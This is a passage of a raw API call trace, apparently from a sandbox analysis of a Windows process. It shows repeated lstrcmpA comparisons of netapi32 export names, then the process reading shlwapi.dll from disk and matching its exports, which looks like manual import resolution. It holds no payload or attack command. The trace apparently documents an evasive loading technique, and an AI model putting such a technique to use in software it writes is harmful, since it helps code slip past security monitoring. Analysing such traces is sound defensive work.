lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0227.327] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0227.327] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0227.327] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0227.327] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0227.327] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0227.327] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0227.327] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0227.327] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0227.328] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0227.329] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0227.330] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0227.331] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0227.332] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0227.333] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0227.334] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0227.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0227.335] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0227.339] GetProcessHeap () returned 0x570000 [0227.339] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x570000) returned 1 [0227.339] GetProcessHeap () returned 0x570000 [0227.340] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5893a0 [0227.340] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0227.340] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0227.340] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0227.340] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0227.340] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0227.341] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0227.341] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0227.341] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0227.341] GetProcessHeap () returned 0x570000 [0227.341] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x51148) returned 0x2d45030 [0227.341] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0227.341] ReadFile (in: hFile=0x17c, lpBuffer=0x2d45030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d45030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0227.346] CloseHandle (hObject=0x17c) returned 1 [0227.346] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0227.346] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0227.346] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0227.346] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0227.346] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0227.346] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0227.346] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0227.346] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0227.346] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0227.347] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0227.347] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0227.347] 